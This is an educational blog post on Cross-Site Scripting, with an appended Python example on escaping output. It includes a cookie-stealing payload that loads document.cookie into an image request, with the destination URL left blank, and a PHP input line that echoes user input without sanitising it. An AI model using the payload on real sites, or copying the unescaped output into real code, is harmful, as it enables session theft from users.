Security First: Cross-Site Scripting (XSS) Attacks - What are they?


Cross-Site Scripting (abbreviated "XSS") is a type of client-side attack which is principally caused by input a server-side application receives not being sanitised (escaped) before it is output in the HTML document (e.g. a username). Merely theorising about what is possible from a Cross-Site Scripting attack will make you realise how important it is to ensure input received through your application is sanitised before it is output to the user on the web page or provided as an attribute value of an HTML element. You may conclude this sounds similar to an SQL injection attack, where input that is not sanitised before it is used as part of an SQL query permits an end user to execute their own arbitrary SQL code, wreak havoc in your SQL database and potentially steal information from it. It is not exactly the same thing, but the principles of protection are similar.

So what exactly does a Cross-Site Scripting attack consist of? In essence, if HTML can be submitted as input and returned as-is, that HTML code will be rendered by the browser. So in theory this means one website can steal the cookie information which its visitor holds for another website.

See this example:

HTML Code:
```html
" /><script>new Image().src = '' + encodeURI(document.cookie);</script><"
```
If you can imagine the following PHP code, you'll see exactly where the output is not being sanitised:

HTML Code:
```html
<input type="text" name="name" value="<?php echo $_POST['name']; ?>" /></p>
```
So in this example, the <input> tag is closed completely so that JavaScript code can be executed. It doesn't matter whether the URL is an image or not: your browser will request the URL in the example above and, before you know it, they have your cookie data. Of course, you may have certain preventative measures in place, for example you may restrict the active cookie to the IP address of the user whose cookie data has been stolen, but the fact that HTML and JavaScript code can be parsed by the browser is dangerous in itself.

How can they steal cookie data?
If you have an area where users can post comments, for example, what if you do not sanitise input before it is displayed on the web page? This is a prime example of where cookie data can be stolen, because HTML and JavaScript code submitted by a user will be parsed by the browser. So this means that if any user visits the page on which the XSS attack is active, their cookie data will also be stolen.

Ways to prevent Cross-Site Scripting attacks
• Sanitise (escape) all output, even if it comes from your web application's database.
• Thoroughly test your web application to make sure it is fully secure in all the areas where an end user can send data to it, e.g. through an HTML form.
• If you want to permit users to use certain HTML tags such as <strong> and <em>, you can consider using a library such as HTML Purifier (although we do not guarantee that the library is fully secure or error-free in what it is supposed to do).
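To make the attribute break-out and the "sanitise all output" advice concrete, here is an added Python example (not code from the original post) that renders the post's vulnerable <input> line with and without escaping for the attribute context; html.escape stands in for PHP's htmlspecialchars() with ENT_QUOTES, and the function names are assumed.

```python
import html
import re

# Constructed to match the attacker value from the post (its server URL left
# empty, as on the page): it closes the value="..." attribute and the <input>
# tag, then opens a <script> element in the page body.
PAYLOAD = '" /><script>new Image().src = \'\' + encodeURI(document.cookie);</script><"'


def render_vulnerable(name: str) -> str:
    """Mirrors <input ... value="<?php echo $_POST['name']; ?>" />: raw output."""
    return f'<input type="text" name="name" value="{name}" />'


def render_escaped(name: str) -> str:
    """Hardened form: encode for the attribute context before output,
    the equivalent of htmlspecialchars($name, ENT_QUOTES, 'UTF-8') in PHP."""
    return f'<input type="text" name="name" value="{html.escape(name, quote=True)}" />'


def attribute_value(fragment: str) -> str:
    """What a browser reads as the value attribute: up to the next raw double quote."""
    m = re.search(r'value="([^"]*)"', fragment)
    return m.group(1) if m else ""


def opens_script_element(fragment: str) -> bool:
    """A raw '<script' start tag outside any attribute would be executed;
    the entity form '&lt;script' is rendered as text and is harmless."""
    return re.search(r"<script\b", fragment, re.IGNORECASE) is not None


def attribute_encoding_is_complete(encoded: str) -> bool:
    """Defensive check for an output encoder: no raw character that can end an
    attribute or start a tag survives, and every '&' is part of an entity.
    Both quote characters are covered so the same encoder is safe in
    value='...' as well as value="..."."""
    no_raw_delimiters = re.search(r"[<>\"']", encoded) is None
    no_raw_ampersand = re.search(r"&(?![A-Za-z#]\w*;)", encoded) is None
    return no_raw_delimiters and no_raw_ampersand


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # attribute ends early, <script> is live
    print(render_escaped(PAYLOAD))      # whole payload stays inside the attribute
```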